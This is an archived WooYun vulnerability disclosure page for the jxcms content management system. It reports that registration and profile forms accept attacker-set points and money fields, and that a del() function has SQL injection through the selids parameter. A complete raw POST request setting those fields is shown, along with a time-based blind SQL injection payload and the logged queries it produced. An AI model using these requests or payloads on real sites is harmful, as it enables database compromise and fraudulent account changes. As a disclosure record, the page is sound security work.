当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101875

漏洞标题:精讯cms sql注入 和 任意刷钱和积分漏洞

相关厂商:jxcms.com

漏洞作者: 路人甲

提交时间:2015-03-18 11:38

修复时间:2015-06-21 11:40

公开时间:2015-06-21 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-17: 细节向核心白帽子及相关领域专家公开
2015-05-27: 细节向普通白帽子公开
2015-06-06: 细节向实习白帽子公开
2015-06-21: 细节向公众公开

简要描述:

精讯cms sql注入 和 任意刷钱和积分漏洞

详细说明:

public function reg() {
		if ($this -> obj -> isLogin()) {
			$go = $this -> referer && !strstr($this -> referer, 'login')?$this -> referer:Url :: getUrl('member');
			$this -> showMsg(L('ALREADY_IS_MEMBER'), $go);
		}
		if ($this -> isSubmit) {
			if ($this -> obj -> reg()) {
				$this -> obj -> login($_POST['info']['username'], $_POST['info']['password']);
				$go = $this -> forward?$this -> forward:Url :: getUrl('member');
				$this -> showMsg(L('REGISTER_SUCCESS'), $go);
			} else $this -> showMsg($this -> obj -> error);
		}
		$this -> assign('title', L('USER_REG'));
		$this -> display('member_reg');
	}
	public function profile() {
		$this -> obj -> isLogin() or $this -> showMsg(L('LOGIN_FIRST'), Url :: getUrl('member', 'login'));
		if ($this -> isSubmit) {
			if ($this -> obj -> edit()) {
				$this -> showMsg(L('OPERATE_SUCCESS'), $this -> referer);
			} else $this -> showMsg($this -> obj -> error);
		}
		$member = $this -> obj -> find(get_cookie('userid'));
		$tmp = explode('-', $member['birthday']);
		$birthday = array('year' => intval($tmp[0]), 'month' => intval($tmp[1]), 'day' => intval($tmp[2]));
		$birthday['timestamp'] = $member['birthday'] != '0000-00-00' ? Func :: timeStamp($member['birthday']) : '';
		$this -> assign('birthday', $birthday);
		$this -> assign('member', $member);
		$this -> assign('title', L('USER_PROFILE'));
		$this -> display('member_profile');
	}


编辑和注册都存在刷钱:

public function reg() {
		if ($this -> obj -> isLogin()) {
			$go = $this -> referer && !strstr($this -> referer, 'login')?$this -> referer:Url :: getUrl('member');
			$this -> showMsg(L('ALREADY_IS_MEMBER'), $go);
		}
		if ($this -> isSubmit) {
			if ($this -> obj -> reg()) {
				$this -> obj -> login($_POST['info']['username'], $_POST['info']['password']);
				$go = $this -> forward?$this -> forward:Url :: getUrl('member');
				$this -> showMsg(L('REGISTER_SUCCESS'), $go);
			} else $this -> showMsg($this -> obj -> error);
		}
		$this -> assign('title', L('USER_REG'));
		$this -> display('member_reg');
	}
	public function profile() {
		$this -> obj -> isLogin() or $this -> showMsg(L('LOGIN_FIRST'), Url :: getUrl('member', 'login'));
		if ($this -> isSubmit) {
			if ($this -> obj -> edit()) {
				$this -> showMsg(L('OPERATE_SUCCESS'), $this -> referer);
			} else $this -> showMsg($this -> obj -> error);
		}
		$member = $this -> obj -> find(get_cookie('userid'));
		$tmp = explode('-', $member['birthday']);
		$birthday = array('year' => intval($tmp[0]), 'month' => intval($tmp[1]), 'day' => intval($tmp[2]));
		$birthday['timestamp'] = $member['birthday'] != '0000-00-00' ? Func :: timeStamp($member['birthday']) : '';
		$this -> assign('birthday', $birthday);
		$this -> assign('member', $member);
		$this -> assign('title', L('USER_PROFILE'));
		$this -> display('member_profile');
	}


发送url:

POST /jxcms/upload/index.php?c=member&a=reg HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/jxcms/upload/index.php?c=member&a=reg
Cookie: CNZZDATA80862620=cnzz_eid%3D973263575-1425454337-http%253A%252F%252Flocalhost%253A8081%252F%26ntime%3D1425951363; bdshare_firstime=1425454416306; CNZZDATA1670348=cnzz_eid%3D2041231052-1425547463-%26ntime%3D1425547463; CKFinder_Settings=LNNDS; 5q2M_2132_saltkey=TNJtXI64; tMAu_2132_saltkey=JmlWB55m; tMAu_2132_lastvisit=1426061040; tMAu_2132_ulastactivity=aac4qmrDgvMMbQn8lDsaj0EN7mYxTcOBDpYZ3l%2FnFqa9sATHz5Qj; 4GLW_2132_saltkey=xsrGKKEh; 4GLW_2132_lastvisit=1426062274; 4GLW_2132_ulastactivity=33febWyp0o%2FuqVB4OwJucth3pEVs9yLX0m9nGj%2FC%2B6lqI2JXPLwe; PHPSESSID=35313d6b4451b6cb3068dec613558296
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 345
forward=http%3A%2F%2Flocalhost%2Fjxcms%2Fupload%2Findex.php%3Fc%3Dmember%26a%3Dlogin&info%5BJXCMS_HASH%5D=04e2d9cb5873fa&info%5Bemail%5D=test3%401673.com&info%5Busername%5D=test3&info%5Bpassword%5D=111111&info%5Bpassword%5D=111111&info%5Bgender%5D=0&captcha=tq5d&regagreement=1&submit=%D7%A2+%B2%E1&info%5Bpoint%5D=111111&info%5Bamount%5D=111111


xxxx.png


xxxxy.png


sql注入:

public function del() {
		$selids = R('selids');
		if (!empty($selids)) {
			$where = strstr($selids, ',')?"id IN ($selids)":"id=$selids";
			
			$data = $this -> where($where) -> select();


发送url:
http://localhost/jxcms/upload/index.php?c=member&a=reg
post:
selids=1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)#
抓取sql:
2015/3/17 14:14 DELETE FROM `jcollect` WHERE id IN (1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)#)
2015/3/17 14:14 SELECT * FROM `jcollect` WHERE id IN (1111,222) or if(ascii(substr((select user()),1,1))=114,benchmark(1000000,md5(123)),1)#)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-21 11:40

厂商回复:

最新状态:

2015-03-23:精迅系统主要是文章系统,资金账户和积分账户只是提供一个字段而已,目前没有开发相关功能,所以即使被人刷了,也不存在大的风险!